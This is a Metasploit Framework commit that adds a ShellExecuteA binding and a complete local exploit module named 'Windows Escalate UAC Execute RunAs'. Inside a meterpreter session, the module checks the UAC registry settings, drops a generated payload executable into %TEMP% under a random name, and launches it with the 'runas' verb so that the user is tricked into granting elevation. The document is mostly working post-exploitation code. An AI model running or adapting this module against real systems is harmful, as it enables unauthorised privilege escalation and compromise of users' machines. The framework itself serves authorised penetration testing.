add RunAs ask module

2012-10-06 00:51:44 -04:00 · 2012-10-06 00:51:44 -04:00 · b984d33996
parent 769fa3743e
commit b984d33996
2 changed files with 117 additions and 0 deletions
--- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_shell32.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_shell32.rb
@ -15,6 +15,15 @@ class Def_shell32
 		dll.add_function('IsUserAnAdmin', 'BOOL', [
 			])

+		dll.add_function('ShellExecuteA', 'DWORD',[
+			["DWORD","hwnd","in"],
+			["PCHAR","lpOperation","in"],
+			["PCHAR","lpFile","in"],
+			["PCHAR","lpParameters","in"],
+			["PCHAR","lpDirectory","in"],
+			["DWORD","nShowCmd","in"]
+			])
+
 		return dll
 	end

--- a/modules/exploits/windows/local/ask.rb
+++ b/modules/exploits/windows/local/ask.rb
@ -0,0 +1,108 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Local
+	Rank = ExcellentRanking
+
+	include Post::Common
+	include Exploit::EXE
+	include Post::File
+
+	def initialize(info={})
+		super( update_info( info,
+			'Name'          => 'Windows Escalate UAC Execute RunAs',
+			'Description'   => %q{
+				This module will attempt to elevate execution level using
+				the ShellExecute undocumented RunAs flag to bypass low
+				UAC settings.
+			},
+			'License'       => MSF_LICENSE,
+			'Author'        => [
+					'mubix <mubix[at]hak5.org>' # Port to local exploit
+				],
+			'Version'       => '$Revision$',
+			'Platform'      => [ 'windows' ],
+			'SessionTypes'  => [ 'meterpreter' ],
+			'Targets'       => [ [ 'Windows', {} ] ],
+			'DefaultTarget' => 0,
+			'References'    => [
+				[ 'URL', 'http://www.room362.com/blog/2012/1/3/uac-user-assisted-compromise.html' ]
+			],
+			'DisclosureDate'=> "Jan 3, 2012"
+		))
+
+		register_options([
+			OptString.new("FILENAME", [ false, "File name on disk"]),
+			OptString.new("PATH", [ false, "Location on disk %TEMP% used if not set" ]),
+			OptBool.new("UPLOAD", [ true, "Should the payload be uploaded?", true ])
+		])
+
+	end
+
+	def exploit
+
+		root_key, base_key = session.sys.registry.splitkey("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System")
+		open_key = session.sys.registry.open_key(root_key, base_key)
+		lua_setting = open_key.query_value('EnableLUA')
+
+		if lua_setting.data == 1
+			print_status "UAC is Enabled, checking level..."
+		else
+			print_good "UAC is not enabled, no prompt for the user"
+		end
+
+		uac_level = open_key.query_value('ConsentPromptBehaviorAdmin')
+
+		case uac_level.data
+		when 2
+			print_status "UAC is set to 'Always Notify'"
+			print_status "The user will be prompted, wait for them to click 'Ok'"
+		when 5
+			print_error "UAC is set to Default"
+			print_error "The user will be prompted, wait for them to click 'Ok'"
+		when 0
+			print_good "UAC is not enabled, no prompt for the user"
+		end
+
+
+		#
+		# Generate payload and random names for upload
+		#
+		payload = generate_payload_exe
+
+		if datastore["FILENAME"]
+			payload_filename = datastore["FILENAME"]
+		else
+			payload_filename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
+		end
+
+		if datastore["PATH"]
+			payload_path = datastore["PATH"]
+		else
+			payload_path = session.fs.file.expand_path("%TEMP%")
+		end
+
+		cmd_location = "#{payload_path}\\#{payload_filename}"
+
+		if datastore["UPLOAD"]
+			print_status("Uploading #{payload_filename} - #{payload.length} bytes to the filesystem...")
+			fd = session.fs.file.new(cmd_location, "wb")
+			fd.write(payload)
+			fd.close
+		end
+
+		session.railgun.shell32.ShellExecuteA(nil,"runas",cmd_location,nil,nil,5)
+
+	end
+end
+